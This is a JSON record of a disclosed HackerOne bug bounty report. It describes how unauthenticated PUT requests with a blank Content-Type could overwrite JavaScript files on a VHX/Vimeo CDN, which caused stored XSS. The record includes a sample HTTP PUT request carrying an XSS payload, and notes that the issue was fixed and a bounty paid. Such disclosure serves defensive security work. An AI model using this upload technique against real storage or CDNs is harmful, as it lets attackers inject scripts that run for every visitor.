{"id": "H1:452559", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "VHX: Possibility to overwrite any file in the vpe.cdn.vimeo.tv leads to the Stored XSS for the all customers on the embed.vhx.tv", "description": "By modifying the Content-Type to be blank, during a PUT command, the researcher was able to upload files to the CDN. This has been resolved.\nIt was possible to write (and overwrite) arbitrary files to the CDN ( `vpe.cdn.vimeo.tv` ) used for JS scripts delivery on the various in-scope assets using the PUT method with blank or application/octet-stream Content-Type. Any other Content-Type caused auth error from Google Cloud Storage side.\nExample:\n```\nPUT /something.js HTTP/1.1\nHost: vpe.cdn.vimeo.tv\nContent-Type: application/octet-stream\nContent-Length: 10\nConnection: close\n\nalert(document.domain)\n```\ncould create `something.js` with XSS payload or overwrite `something.js` if it already exist.\n\nThe issue was fixed fast. Thanks to the VHX team for the great experience, awesome communication and the bounty!", "published": "2018-11-29T14:55:03", "modified": "2019-07-10T19:12:30", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/452559", "reporter": "sp1d3rs", "references": [], "cvelist": [], "lastseen": "2019-07-31T14:53:54", "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2019-07-31T14:53:54", "rev": 2}, "score": {"value": 0.6, "vector": "NONE", "modified": "2019-07-31T14:53:54", "rev": 2}, "vulnersScore": 0.6}, "bounty": 1500.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/vhx", "handle": "vhx", "profile_picture_urls": {"small": "https://hackerone.com/rails/active_storage/representations/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBBdXZmIiwiZXhwIjpudWxsLCJwdXIiOiJibG9iX2lkIn19--f5c5519def7e4402998a7fdfaa866864a56b711a/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaDdCam9VWTI5dFltbHVaVjl2Y0hScGIyNXpld2c2REdkeVlYWnBkSGxKSWd0RFpXNTBaWElHT2daRlZEb0xjbVZ6YVhwbFNTSUxOako0TmpKZUJqc0hWRG9KWTNKdmNFa2lEall5ZURZeUt6QXJNQVk3QjFRPSIsImV4cCI6bnVsbCwicHVyIjoidmFyaWF0aW9uIn19--c38a870d322217b0422c840e7586b68994be38b4/PVV8TaeF.png", "medium": "https://hackerone.com/rails/active_storage/representations/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBBdXZmIiwiZXhwIjpudWxsLCJwdXIiOiJibG9iX2lkIn19--f5c5519def7e4402998a7fdfaa866864a56b711a/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaDdCam9VWTI5dFltbHVaVjl2Y0hScGIyNXpld2c2REdkeVlYWnBkSGxKSWd0RFpXNTBaWElHT2daRlZEb0xjbVZ6YVhwbFNTSUxPREo0T0RKZUJqc0hWRG9KWTNKdmNFa2lEamd5ZURneUt6QXJNQVk3QjFRPSIsImV4cCI6bnVsbCwicHVyIjoidmFyaWF0aW9uIn19--0e71f6791faebe1c35f4452bd21d67fb6decfbc2/PVV8TaeF.png"}}, "h1reporter": {"disabled": false, "username": "sp1d3rs", "url": "/sp1d3rs", "profile_picture_urls": {"small": "https://hackerone.com/rails/active_storage/representations/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBBcVUwIiwiZXhwIjpudWxsLCJwdXIiOiJibG9iX2lkIn19--da0006192ecf3959c07ad17311a46e6e0f530d33/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaDdCam9VWTI5dFltbHVaVjl2Y0hScGIyNXpld2c2REdkeVlYWnBkSGxKSWd0RFpXNTBaWElHT2daRlZEb0xjbVZ6YVhwbFNTSUxOako0TmpKZUJqc0hWRG9KWTNKdmNFa2lEall5ZURZeUt6QXJNQVk3QjFRPSIsImV4cCI6bnVsbCwicHVyIjoidmFyaWF0aW9uIn19--c38a870d322217b0422c840e7586b68994be38b4/z.png"}, "is_me?": false, "hackerone_triager": false, "hacker_mediation": false}}

{}